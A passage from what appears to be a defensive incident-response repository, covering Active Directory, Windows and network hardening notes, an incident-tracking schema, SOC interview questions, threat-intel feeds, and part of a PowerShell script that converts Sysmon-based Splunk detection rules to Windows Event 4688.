| - [Limit Guest Access](#limit-guest-access) 4 | - [Turn off File Sharing and File Storage Options](#turn-off-file-sharing-and-file-storage-options) 5 | - [Block Third-Party Applications](#block-third-party-applications) 6 | - [Restrict Users who can Create Teams Channels](#restrict-users-who-can-create-teams-channels) 7 | - [Set Teams Expiration](#set-teams-expiration) 8 | - [Set up Advanced Threat Protection Policies for Teams](#set-up-advanced-threat-protection-policies-for-teams) 9 | - [Set up app Protection Policies](#set-up-app-protection-policies) 10 | - [Set up Data Loss prevention Polcies](#set-up-data-loss-prevention-polcies) 11 | - [Additional Resources](#additional-resources) 12 | 13 | # Utilize Private Channels 14 | 15 | # Block External Access 16 | 17 | # Limit Guest Access 18 | 19 | # Turn off File Sharing and File Storage Options 20 | 21 | # Block Third-Party Applications 22 | 23 | # Restrict Users who can Create Teams Channels 24 | 25 | # Set Teams Expiration 26 | 27 | # Set up Advanced Threat Protection Policies for Teams 28 | 29 | # Set up app Protection Policies 30 | 31 | # Set up Data Loss prevention Polcies 32 | 33 | 34 | # Additional Resources 35 | - https://usc.pax8.com/resource/display/33588 36 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 37 | -------------------------------------------------------------------------------- /hardening/microsoft-active-directory.md: -------------------------------------------------------------------------------- 1 | - [Domain Controller Redundancy](#domain-controller-redundancy) 2 | - [Ensure Regular Backup of GPO's](#ensure-regular-backup-of-gpos) 3 | - [Ensure the Directory Services Restore Mode (DSRM) password is Set](#ensure-the-directory-services-restore-mode-dsrm-password-is-set) 4 | - [Windows Firewall](#windows-firewall) 5 | - [RDP](#rdp) 6 | - [Microsoft Local Administrator Password Solution (LAPS)](#microsoft--local-administrator-password-solution-laps) 7 | - [Least Privilege and Tiered Admin](#least-privilege-and-tiered-admin) 8 | - [Service Account Restrictions](#service-account-restrictions) 9 | - [Protected Users Security Group](#protected-users-security-group) 10 | - [Eliminate Older Operating Systems](#eliminate-older-operating-systems) 11 | - [Set GPO to Reprocess Even if Not Changed](#set-gpo-to-reprocess-even-if-not-changed) 12 | - [Group Managed Service Accounts](#group-managed-service-accounts) 13 | - [Additional Resources](#additional-resources) 14 | 15 | # Domain Controller Redundancy 16 | - Ensure there is a domain controller that can be quickly taken offline in the need of an isolation to prevent rebuilding. Preferable one that holds FSMO roles. 17 | - ```netdom query fsmo``` 18 | 19 | # Ensure Regular Backup of GPO's 20 | - ```backup-gpo -domain "domain.local" -all -path "c:\temp\gpo-backups"``` 21 | 22 | # Ensure the Directory Services Restore Mode (DSRM) password is Set 23 | To a known value on all Domain Controllers. The steps will need to be initiated on each Domain Controller: 24 | ``` 25 | PS C:\Windows\system32> ntdsutil 26 | C:\Windows\System32\ntdsutil.exe: set drsm password 27 | Reset DRSM Administrator Password: reset password on server null 28 | Please type password for DS Restore Mode Administrator Account: *** 29 | Please confirm new password: *** 30 | Password has been set successfully. 31 | ``` 32 | 33 | # Windows Firewall 34 | - Maintain at least a workstation and server Group Policy Object (GPO) to control the Windows Firewall 35 | - Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security 36 | - Generally, it is best to limit the following scenarios 37 | - Workstation-to-workstation communication 38 | - Server-to-server communication 39 | - Server-to-workstation communication 40 | - At a minimum, consider restrict the following ports where possible 41 | - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139) 42 | - Remote Desktop Protocol (RDP) (TCP/3389) 43 | - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986) 44 | - Windows Management Instrumentation (WMI) (Dynamic/DCOM) 45 | - Consider setting "Apply local firewall rules" and "Apply local connection security rules" to "No" for all profiles 46 | 47 | # RDP 48 | - Network Level Authentication (NLA) provides an extra layer of pre-authentication before a connection is established. NLA is also useful for protecting against brute force attacks, which often target open internet-facing RDP servers 49 | - Computer Configuration > Policies > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security > Require user authentication for remote connections by using Network Level Authentication 50 | 51 | 52 | # Microsoft Local Administrator Password Solution (LAPS) 53 | - Deploy LAPS to avoid having the same local administrator password on every system on the network. Otherwise, adversary pivoting from a compromised system is extremely simplified. 54 | - https://www.microsoft.com/en-us/download/details.aspx?id=46899 55 | 56 | 57 | # Least Privilege and Tiered Admin 58 | - Maintain and enforce use of separate user and admin accounts. 59 | - Maintain separate admin accounts for workstations, servers, and domain admin use to minimize lateral movement that traverses system types. As a result, any attempted use of an account in the wrong environment is an immediate red flag. 60 | 61 | 62 | # Service Account Restrictions 63 | - Restrict service accounts to their absolute minimum rights to perform their tasks. Most of the settings below can be set on one or more service account 64 | - Deny access to this computer from the network 65 | - Deny log on as a batch job 66 | - Deny log on locally 67 | - Deny log on through Terminal Services 68 | - All settings above can be found at the GPO path below 69 | - Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment 70 | - Service accounts that can be restricted to a single system can have this enforced via the Active Directory account's properties > Account Tab > "Log On To" button 71 | 72 | 73 | # Protected Users Security Group 74 | - Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2 and above have this group, which applies the following restrictions to the member accounts. 75 | - The Kerberos ticket granting ticket (TGT) expires after 4 hours, rather than the normal 10-hour default setting. 76 | - Only Kerberos authentication is used (NTLM authentication is disabled). 77 | - Cached credentials are blocked (Domain Controller must be accessible to authenticate). 78 | - WDigest authentication is disabled. 79 | - Kerberos with AES encryption will be enforced for pre-authentication. 80 | - The "Account is sensitive and cannot be delegated" setting, as seen in Active Directory Users and Computers, is enforced. 81 | - Note: requires domain functional level to be Windows Server 2012 R2 or higher. 82 | - Note: NO service account should be added to the “Protected Users” security group as authentication will fail. 83 | - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn466518(v=ws.11)?redirectedfrom=MSDN 84 | 85 | 86 | # Eliminate Older Operating Systems 87 | - Find any means necessary to eliminate Windows 7 / Server 2008 and older systems from the network. 88 | - For any unavoidable older OS's, apply some additional restrictions 89 | - Computer Configuration > Policies > Administrative Templates > MS Security Guide > WDigest Authentication > DISABLE 90 | 91 | 92 | # Set GPO to Reprocess Even if Not Changed 93 | - Many attackers will manually change settings on endpoints by directly modifying the registry. Even on endpoints where registry settings are automatically set via GPO it is recommended to enforce the Group Policy settings and configure automatic policy reprocessing for the configured settings on an automated basis. 94 | - Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure **security** policy processing–Enabled - Process even if the GPOs have not changed 95 | - Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure **registry** policy processing–Enabled - Process even if the GPOs have not changed 96 | 97 | # Group Managed Service Accounts 98 | - https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview 99 | - https://blog.stangroome.com/2013/07/28/avoid-password-management-with-group-managed-service-accounts/ 100 | 101 | 102 | 103 | # Additional Resources 104 | - Mandiant Whitepaper: Ransomware Protection and Containment Strategies 105 | - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf 106 | - SANS course and public materials 107 | - https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material 108 | - https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model 109 | -------------------------------------------------------------------------------- /hardening/microsoft-windows-dns.md: -------------------------------------------------------------------------------- 1 | - Open the Domain Name System Microsoft Management Console (DNS MMC) snap-in. 2 | - Click Start → Programs → Administrative Tools, then select DNS. 3 | - From the DNS Server, right-click the server and select the Properties submenu. 4 | - Click the Debug Logging tab, then select Log packets debugging. 5 | - Ensure that the Incoming, UDP, Queries/Transfer, and Request checkboxes are selected. 6 | - File location is: systemroot\System32\Dns\Dns.log 7 | -------------------------------------------------------------------------------- /hardening/microsoft-windows.md: -------------------------------------------------------------------------------- 1 | - [Windows Firewall](#windows-firewall) 2 | - [User Account Control and Virtualization](#user-account-control-and-virtualization) 3 | - [Credential Guard](#credential-guard) 4 | - [Limit Cached Credential Count](#limit-cached-credential-count) 5 | - [Resources](#resources) 6 | 7 | Note that [Active Directory](active-directory.md) GPO should be used as much as possible over individually targeting Windows systems. 8 | 9 | # Windows Firewall 10 | This can be controlled via [network](network.md) devices, Active Directory GPO, and/or via Windows Firewall directly on endpoints. 11 | - Systems should NOT be allowed to communicate with each other or outbound to workstations unless absolutely necessary. 12 | - Generally, it is best to limit the following scenarios 13 | - Workstation-to-workstation communication 14 | - Server-to-server communication 15 | - Server-to-workstation communication 16 | - At a minimum, consider restrict the following ports where possible 17 | - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139) 18 | - Remote Desktop Protocol (RDP) (TCP/3389) 19 | - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986) 20 | - Windows Management Instrumentation (WMI) (Dynamic/DCOM) 21 | - Consider setting "Apply local firewall rules" and "Apply local connection security rules" to "No" for all profiles 22 | 23 | # User Account Control and Virtualization 24 | - https://www.microsoftpressstore.com/articles/article.aspx?p=2228450&seqNum=9 25 | 26 | 27 | # Credential Guard 28 | - https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements 29 | 30 | 31 | # Limit Cached Credential Count 32 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\Current Version\Winlogon\CachedLogonsCount 33 | 34 | # Resources 35 | - Mandiant Whitepaper: Ransomware Protection and Containment Strategies 36 | - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf -------------------------------------------------------------------------------- /hardening/network.md: -------------------------------------------------------------------------------- 1 | - [Endpoint Segmentation](#endpoint-segmentation) 2 | - [Threat Intelligence-Based Blocking](#threat-intelligence-based-blocking) 3 | - [Services](#services) 4 | - [Remote Desktop Protocol](#remote-desktop-protocol) 5 | - [Maintain Network Documentation](#maintain-network-documentation) 6 | - [](#) 7 | - [Resources](#resources) 8 | 9 | # Endpoint Segmentation 10 | Implement and ensure robust network segmentation between networks and functions to reduce the spread of the ransomware. Define a demilitarized zone that eliminates unregulated communication between networks. 11 | - Endpoints should NOT be allowed to communicate with each other unless absolutely necessary. This peer-level communication can be controlled via [Private VLANs](https://en.wikipedia.org/wiki/Private_VLAN) (AKA port isolation) on switches. 12 | - Generally, it is best to limit the following scenarios 13 | - Workstation-to-workstation communication 14 | - Server-to-server communication 15 | - Server-to-workstation communication 16 | - At a minimum, consider restrict the following ports where possible 17 | - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139) 18 | - Remote Desktop Protocol (RDP) (TCP/3389) 19 | - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986) 20 | - Windows Management Instrumentation (WMI) (Dynamic/DCOM) 21 | 22 | # Threat Intelligence-Based Blocking 23 | Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. 24 | - Ideally performed automatically with a curated threat intelligence feed, but also allowing for management of a manual block/allowlist. 25 | 26 | # Services 27 | ## Remote Desktop Protocol 28 | - RDP was designed to be used internally and should never be exposed to the Internet. Instead, expose VPN to the Internet and make RDP accessible internally only. 29 | - After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication. 30 | 31 | # Maintain Network Documentation 32 | Develop/update network maps to ensure a full accounting of all equipment that is connected to the network. 33 | - Remove any equipment from networks that is not required to conduct operations to reduce the attack surface malicious actors can exploit. 34 | 35 | # 36 | Establish baselines of network traffic, application execution, and account authentication. 37 | Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric. 38 | 39 | # Resources 40 | - Mandiant Whitepaper: Ransomware Protection and Containment Strategies 41 | - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf 42 | - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a?mc_cid=78cd2ac95a&mc_eid=UNIQID -------------------------------------------------------------------------------- /hardening/remote-access.md: -------------------------------------------------------------------------------- 1 | - Utilize blocklisting and allowlisting to limit remote access to users with a verified business and/or operational need. 2 | - Ensure that all remote access technologies have logging enabled and regularly audit these logs to identify instances of unauthorized access. 3 | - Audit networks for systems using remote access services. 4 | - Close unneeded network ports associated with remote access services (e.g., RDP – Transmission Control Protocol [TCP] Port 3389). 5 | - When configuring access control for a host, utilize custom settings to limit the access a remote party can attempt to acquire. 6 | -------------------------------------------------------------------------------- /hardening/software-manufacturers.md: -------------------------------------------------------------------------------- 1 | # Eliminate default passwords 2 | # Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers 3 | - in conjunction with customers - to understand how response teams use logs to investigate incidents. 4 | 5 | # Resources 6 | - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a?mc_cid=78cd2ac95a&mc_eid=UNIQID -------------------------------------------------------------------------------- /hardening/web-security.md: -------------------------------------------------------------------------------- 1 | # Threat Intelligence-Based Blocking 2 | - Implement a URL blocklist and/or allowlist to prevent users from accessing malicious websites. Ideally sites are categorized, including Uncategorized, Newly Registered, and Known Malicious (or similar). -------------------------------------------------------------------------------- /incident-tracking.md: -------------------------------------------------------------------------------- 1 | Tables and their fields are listed below. 2 | - Fields are focused on enabling information sharing between analysts and useful metrics. 3 | - Fields with dropdowns have selection values provided in-line. 4 | - Tables may "lookup" entries in another table to establish a relationship. 5 | 6 | - [Incidents](#incidents) 7 | - [Indicator of Compromise](#indicator-of-compromise) 8 | - [Adversary](#adversary) 9 | - [Software](#software) 10 | - [Affected Systems](#affected-systems) 11 | - [Affected Users](#affected-users) 12 | - [Attack Techniques](#attack-techniques) 13 | - [Emails](#emails) 14 | - [Use Cases/Plays](#use-casesplays) 15 | - [Work Log](#work-log) 16 | - [Mitigations](#mitigations) 17 | - [Owner](#owner) 18 | - [Signature](#signature) 19 | - [Hunts](#hunts) 20 | - [Hunt Backlog](#hunt-backlog) 21 | 22 | # Incidents 23 | - Adversary (Lookup) 24 | - Signature (lookup) 25 | - Use Cases/Plays (Lookup) 26 | - Attack Techniques (Lookup) 27 | - Mitigations (Lookup) 28 | - Affected Software (Lookup) 29 | - Affected Systems (Lookup) 30 | - Affected Users (Lookup) 31 | - Emails (Lookup) 32 | - Related Incidents (Lookup) 33 | - Work Log (Lookup) 34 | - Resolutions (Lookup) 35 | - Owner (Lookup) 36 | - Date Activity Started 37 | - Date Activity Stopped 38 | - Date Client Notified 39 | - Date Closed 40 | - Closed By 41 | - Date Reported 42 | - Reported By 43 | - Date Reviewed 44 | - Reviewed by 45 | - Date Last Updated 46 | - Last updated by 47 | - Date Created 48 | - Created By 49 | - Title/Subject 50 | - Executive Summary 51 | - Internal Comments 52 | - Origination 53 | - Threat Hunting 54 | - SIEM Correlation 55 | - Alarm from EDR 56 | - Alarm from AV 57 | - Alarm from IDS/IPS 58 | - Reported by Internal User 59 | - Reported by Third Party 60 | - Reported by Adversary 61 | - Threat Hunting 62 | - Audit 63 | - Origination Details 64 | - External Related IDs 65 | - Priority 66 | - Emergency 67 | - High 68 | - Medium 69 | - Low 70 | - Outcome 71 | - True Positive 72 | - False Positive 73 | - Benign 74 | - Indeterminate 75 | - Root Cause 76 | - Training/Awareness 77 | - Policy Violation 78 | - Missing Patch 79 | - Zero Day 80 | - Configuration Weakness 81 | - Power Failure 82 | - Hardware Failure 83 | - Software Failure 84 | - Sabotage 85 | - Scope of Compromise 86 | - Initial Access 87 | - Execution 88 | - Persistence 89 | - Privilege Escalation 90 | - Defense Evasion 91 | - Credential Access 92 | - Discovery 93 | - Lateral Movement 94 | - Collection 95 | - Command and Control 96 | - Exfiltration 97 | - Impact 98 | - No Compromise 99 | - Status 100 | - New 101 | - In Progress 102 | - Closed 103 | - Pending 104 | - On Hold 105 | - Cancelled 106 | - Duplicate 107 | - Escalation Level 108 | - Level 1 109 | - Level 2 110 | - Level 3 111 | - External 112 | - Attachments 113 | - Change Log 114 | 115 | 116 | # Indicator of Compromise 117 | - IP 118 | - Hostname 119 | - Domain Name 120 | - Date Last Observed 121 | 122 | 123 | # Adversary 124 | - Name 125 | - Aliases 126 | - References 127 | - Signatures (lookup) 128 | - Attack Techniques (lookup) 129 | 130 | 131 | 132 | # Software 133 | - Vendor 134 | - Product 135 | - Version 136 | 137 | # Affected Systems 138 | - Internal IP(s) 139 | - Public IP(s) 140 | - MAC(s) 141 | - Hostname 142 | - User (Lookup) 143 | - Location 144 | - Platform 145 | - Operating System 146 | - Operating System Version 147 | 148 | # Affected Users 149 | - Name 150 | - Email 151 | - Phone 152 | - Username 153 | 154 | # Attack Techniques 155 | - ID 156 | - Name 157 | - URL 158 | 159 | # Emails 160 | - Subject 161 | - Sender 162 | - Recipients 163 | - Body 164 | - Attachments 165 | - Date Sent 166 | - Header 167 | 168 | 169 | # Use Cases/Plays 170 | - Title 171 | - Link 172 | 173 | # Work Log 174 | - Owner (Lookup) 175 | - Date and Time of Work 176 | - Title 177 | - Details 178 | 179 | # Mitigations 180 | - Title 181 | - Description 182 | 183 | # Owner 184 | - Username 185 | - Full Name 186 | 187 | 188 | # Signature 189 | - Name 190 | - Use Case (Lookup) 191 | - Event Feed (lookup) 192 | - Adversaries (lookup) 193 | - Use Case (lookup) 194 | - Attack Techniques (lookup) 195 | - Date Last Reviewed 196 | - Date Last Validated 197 | - Severity 198 | - Fidelity 199 | - Status 200 | - References 201 | - Attack Simluation 202 | - Notess 203 | - Change Log 204 | - Sample Source Events 205 | - Pseudologic 206 | - Deployed Logic 207 | - Sigma Logic 208 | 209 | # Hunts 210 | - Name - Hypothesis statement - what is being hunted for 211 | - Description - Details to provide context surrounding who, what, when, where, how, etc. Anticipate questions and answer them here. 212 | - Data Sources - Types of data to be analyzed and where they come from 213 | - Duration - Dataset mininum and maximum age 214 | - Scope - which systems, assets, etc. should be included 215 | - MITRE Tactics (lookup) - if any are applicable 216 | - MITRE Techniques (lookup) - if any are applicable 217 | - Adversary Groups (lookup) - or related recognizable names like botnet names, ransomware as a service names, etc. 218 | - Script - how the hunt is actually conducted. May be geared toward a specific tool, but should have enough detail to allow reproduction in another tool. Should include specific techniques and detail sufficient for another hunter to reproduce the hunt. 219 | - Resources (links, report names) 220 | 221 | # Hunt Backlog 222 | - Hunt (lookup) 223 | - Name (hypothesis or trigger) 224 | - Hunt Model - Reactive or Proactive 225 | - Date performed 226 | - Hunters 227 | - Result (proven, disproven, inconclusive) 228 | - Lessons Learned 229 | - Script (how this specific hunt was conducted) 230 | - Count of incidents created 231 | - Count of use cases/signatures updated 232 | - Threat Intelligence output produced 233 | - Security Recommendations produced 234 | - Vulnerability findings produced 235 | - Knowledge gained 236 | - Visiblity gained 237 | - New analysis techniques extracted 238 | - New data sources obtained 239 | - Time Spent 240 | 241 | -------------------------------------------------------------------------------- /interview-questions.md: -------------------------------------------------------------------------------- 1 | # General 2 | - Why are you looking for work? 3 | - Could you describe the perfect job for you at this point in your career? 4 | - If you were to be given someone to mentor, how would you go about training them? 5 | - As technology develops and processes and requirements change, how do you ensure your team is kept up to date and delivers a uniform, professional service? 6 | - Can you give an example of a task you automated to save time or speed up work? 7 | - Can you give an example of a signature that stemmed from a threat hunt you performed? 8 | - Can you explain the MITRE ATT&CK framework and how you've leveraged it? 9 | - If you were given a blank check to set up a SOC with the primary responsibility of detecting and responding to security incidents, what would your setup look like? 10 | - Technologies used? (AV, EDR, IDS, SIEM, ticketing, etc) 11 | - Logs pulled? 12 | - How do you make use of logs? 13 | 14 | 15 | # Forensics 16 | - If you could run one tool or suite against a dead box in a forensics case, what would you choose and why? 17 | - what is your go-to approach for developing a timeline for an executive report? 18 | - What is ShimCache/AppCompatCache? 19 | - Application compatibility artifact 20 | - Only contains info until the most recent shutdown – rest is stored in memory 21 | - Chronologically stored with the most recent at the top 22 | - What is AmCache? 23 | - C:\Windows\appcompat\Programs\Amcache.hve 24 | - Stores metadata related to PE execution 25 | - Records SHA1 and full file path 26 | - What makes prefetch so valuable? 27 | - Have you ever analyzed the SRUM before? 28 | - What is MRUListEx? 29 | - What is a Mutex/Mutant? 30 | - Indicator used by malware to determine if a host has been infected before 31 | - Digital vaccine 32 | 33 | 34 | # Incident Response 35 | - How would you investigate an incident where a webserver was found to be potentially have a webshell? 36 | - What are some key sensitive files on a Windows box? 37 | - SAM file 38 | - User Registry Hives 39 | - What you would do in a potential ransomware incident? eg. A company server is online and confirmed to have been hit with ransomware. You’re on call and now have to direct the situation – what do you do first? 40 | -------------------------------------------------------------------------------- /mitigation-categories.md: -------------------------------------------------------------------------------- 1 | - Account Use Policies 2 | - Active Directory Configuration 3 | - Antivirus/Antimalware 4 | - Application Developer Guidance 5 | - Application Isolation and Sandboxing 6 | - Audit 7 | - Behavior Prevention on Endpoint 8 | - Boot Integrity 9 | - Code Signing 10 | - Credential Access Protection 11 | - Data Backup 12 | - Data Loss Prevention 13 | - Disable or Remove Feature or Program 14 | - Do Not Mitigate 15 | - Encrypt Sensitive Information 16 | - Environment Variable Permissions 17 | - Execution Prevention 18 | - Exploit Protection 19 | - Filter Network Traffic 20 | - Limit Access to Resource Over Network 21 | - Limit Hardware Installation 22 | - Limit Software Installation 23 | - Multi-factor Authentication 24 | - Network Intrusion Prevention 25 | - Network Segmentation 26 | - Operating System Configuration 27 | - Password Policies 28 | - Pre-compromise 29 | - Privileged Account Management 30 | - Privileged Process Integrity 31 | - Remote Data Storage 32 | - Restrict File and Directory Permissions 33 | - Restrict Library Loading 34 | - Restrict Registry Permissions 35 | - Restrict Web-Based Content 36 | - Software Configuration 37 | - SSL/TLS Inspection 38 | - Threat Intelligence Program 39 | - Update Software 40 | - User Account Control 41 | - User Account Management 42 | - User Training 43 | - Vulnerability Scanning 44 | 45 | 46 | # Resources 47 | - See Mitre's mitigations at https://attack.mitre.org/mitigations/enterprise/ 48 | -------------------------------------------------------------------------------- /osintel.md: -------------------------------------------------------------------------------- 1 | # RSS 2 | - https://msrc-blog.microsoft.com/feed 3 | - https://www.cisa.gov/uscert/ncas/alerts.xml 4 | - https://www.cisa.gov/uscert/ncas/analysis-reports.xml 5 | - https://www.cisa.gov/uscert/ncas/bulletins.xml 6 | - https://www.cisa.gov/uscert/ncas/current-activity.xml 7 | - https://thedfirreport.com/feed/ 8 | - https://adsecurity.org/?feed=rss2 9 | - https://cqureacademy.com/feed 10 | - https://dfir.blog/rss/ 11 | - https://feeds.feedburner.com/IrongeeksSecuritySite 12 | - https://laskowski-tech.com/feed 13 | - https://medium.com/feed/@Cyb3rWard0g 14 | - https://ponderthebits.com/feed/ 15 | - https://posts.specterops.io/feed 16 | - https://www.us-cert.gov/ncas/alerts.xml 17 | - https://www.welivesecurity.com/category/cybercrime,malware,cybersecurity,password,scams,vulnerability,mobile-security,threat-reports/feed/ 18 | - https://www.zerodayinitiative.com/blog?format=rss 19 | 20 | 21 | 22 | # Subscriptions 23 | - [CIS Advisories](https://learn.cisecurity.org/ms-isac-subscription) 24 | - [Microsoft Technical Security Notifications](https://www.microsoft.com/en-us/msrc/technical-security-notifications) 25 | - [CISA Alerts](https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138) 26 | 27 | 28 | # Other 29 | - [CISA Directives](https://www.cisa.gov/directives) 30 | - [CISA Known-Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities) 31 | -------------------------------------------------------------------------------- /response-tools-resources.md: -------------------------------------------------------------------------------- 1 | # Free Resources 2 | 3 | ## Curated Lists 4 | - https://github.com/sbilly/awesome-security 5 | - https://github.com/rshipp/awesome-malware-analysis 6 | - https://github.com/cugu/awesome-forensics 7 | 8 | ## Guides and FAQ 9 | - NIST Computer Security Incident Handling Guide (800-61r2) 10 | - https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final 11 | 12 | ## Forms and Templates 13 | - Security Policy Templates 14 | - https://www.sans.org/information-security-policy/?per-page=100 15 | 16 | ## Reference Materials and Cheat Sheets 17 | - Jai Minton's DFIR Cheat Sheet 18 | - https://www.jaiminton.com/cheatsheet/DFIR/#persistence-and-automatic-loadrun-reg-keys 19 | - CISA Incident Response Series 20 | - https://www.youtube.com/playlist?list=PL-BF3N9rHBLJaSbTRPyWYj56f0m2uDQD7 21 | - s0cm0nkeys Security Reference Guide 22 | - https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/ 23 | 24 | ## Live Forensics Tools 25 | - Google Rapid Response (GRR) 26 | - https://github.com/google/grr 27 | - Meerkat 28 | - https://github.com/TonyPhipps/Meerkat 29 | 30 | ## Offline Forensics Tools 31 | - log2timeline & Plaso 32 | - https://github.com/log2timeline/plaso 33 | - https://github.com/mark-hallman/plaso_filters/blob/master/Plaso_Filtering_Cheat-Sheet_V1.03.pdf 34 | - https://www.sans.org/blog/digital-forensics-sift-ing-cheating-timelines-with-log2timeline/ 35 | - https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html 36 | - Timesketch 37 | - http://timesketch.org/ 38 | - https://github.com/google/timesketch 39 | - Autopsy 40 | - https://www.autopsy.com/ 41 | - Timeline Explorer 42 | - https://ericzimmerman.github.io/#!index.md 43 | - apfs-fuse 44 | - https://github.com/sgan81/apfs-fuse 45 | - Hayabusa 46 | - https://github.com/Yamato-Security/hayabusa 47 | - Takanjo 48 | - https://github.com/Yamato-Security/takajo 49 | 50 | # Non-Free Resources 51 | 52 | ## Courses 53 | - SANS SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling 54 | - https://www.sans.org/cyber-security-courses/hacker-techniques-incident-handling/ 55 | - SANS SEC555: SIEM with Tactical Analytics 56 | - https://www.sans.org/cyber-security-courses/siem-with-tactical-analytics/ 57 | - SANS FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics 58 | - https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/ 59 | -------------------------------------------------------------------------------- /sigma/Copy-SplunkSigma-Sysmon1-to-4688.ps1: -------------------------------------------------------------------------------- 1 | function Copy-Sysmon1-to-4688 { 2 | <# 3 | .SYNOPSIS 4 | Takes a savedsearches.conf and looks for rules based on Sysmon Event ID 1, then copies them to another file. 5 | Then, replaces key values in the rules to work with Windows Security Event ID 4688. 6 | 7 | .DESCRIPTION 8 | Takes a savedsearches.conf and looks for rules based on Sysmon Event ID 1, then copies them to another file. 9 | Then, replaces key values in the rules to work with Windows Security Event ID 4688. 10 | 11 | .EXAMPLE 12 | cd c:\path\to\savedsearches 13 | Copy-Sysmon1-to-4688 14 | 15 | .EXAMPLE 16 | Copy-Sysmon1-to-4688 -inputFile c:\savedsearches.conf 17 | 18 | .EXAMPLE 19 | Copy-Sysmon1-to-4688 -inputFile c:\savedsearches.conf -outputFile c:\4688\savedsearches.conf 20 | 21 | 22 | .NOTES 23 | Updated: 2024-08-29 24 | 25 | Contributing Authors: 26 | Anthony Phipps 27 | 28 | LEGAL: Copyright (C) 2024 29 | This program is free software: you can redistribute it and/or modify 30 | it under the terms of the GNU General Public License as published by 31 | the Free Software Foundation, either version 3 of the License, or 32 | (at your option) any later version. 33 | 34 | This program is distributed in the hope that it will be useful, 35 | but WITHOUT ANY WARRANTY; without even the implied warranty of 36 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 37 | GNU General Public License for more details. 38 | 39 | You should have received a copy of the GNU General Public License 40 | along with this program. If not, see . 41 | 42 | .LINK 43 | 44 | #> 45 | 46 | [CmdletBinding()] 47 | param( 48 | [Parameter()] 49 | [String] $inputFile = ".\savedsearches.conf", 50 | 51 | [Parameter()] 52 | [String] $outputFile = ".\savedsearches_4688.conf" 53 | ) 54 | 55 | begin{ 56 | 57 | $DateScanned = ((Get-Date).ToUniversalTime()).ToString("yyyy-MM-dd HH:mm:ssZ") 58 | Write-Information -InformationAction Continue -MessageData ("Started at {0}" -f $DateScanned) 59 | 60 | $stopwatch = New-Object System.Diagnostics.Stopwatch 61 | $stopwatch.Start() 62 | } 63 | 64 | process{ 65 | 66 | # Define the string to search for 67 | $searchString = "EventID=1 " 68 | 69 | # Initialize a dynamic array (ArrayList) to hold the last two lines 70 | $lineBuffer = New-Object System.Collections.ArrayList 71 | 72 | # Clear or create the output file 73 | New-Item -Path $outputFile -ItemType File -Force 74 | 75 | # Read the input file line by line 76 | Get-Content $inputFile | ForEach-Object { 77 | $currentLine = $_ 78 | 79 | # Check if the current line contains the search string 80 | if ($currentLine -match $searchString) { 81 | # Write the last two lines and the current line to the output file 82 | foreach ($line in $lineBuffer) { 83 | Add-Content -Path $outputFile -Value $line 84 | } 85 | Add-Content -Path $outputFile -Value $currentLine 86 | } 87 | 88 | # Update the line buffer with the last two lines 89 | if ($lineBuffer.Count -ge 2) { 90 | $lineBuffer.RemoveAt(0) 91 | } 92 | $lineBuffer.Add($currentLine) | Out-Null 93 | } 94 | 95 | # Replace values to match Security Log 4688 96 | (Get-Content $outputFile) | ForEach-Object { 97 | # Apply the replacements to the line 98 | $_ = $_ -replace 'Channel="Microsoft-Windows-Sysmon/Operational"', 'Channel="Security"' 99 | $_ = $_ -replace 'EventID=1 ', 'EventID=4688 ' 100 | $_ = $_ -replace 'ParentImage', 'ParentProcessName' 101 | $_ = $_ -replace 'Image', 'NewProcessName' 102 | $_ = $_ -replace ' OR OriginalFileName=".*?"', '' 103 | $_ = $_ -replace ' OriginalFileName=".*?"', '' 104 | $_ = $_ -replace ' OR Product=".*?"', '' 105 | $_ = $_ -replace ' Product=".*?"', '' 106 | $_ = $_ -replace ' OR Company=".*?"', '' 107 | $_ = $_ -replace ' Company=".*?"', '' 108 | $_ = $_ -replace ' OR Description=".*?"', '' 109 | $_ = $_ -replace ' Description=".*?"', '' 110 | $_ = $_ -replace ' OR IntegrityLevel=".*?"', '' 111 | $_ = $_ -replace ' IntegrityLevel=".*?"', '' 112 | $_ = $_ -replace ' OR 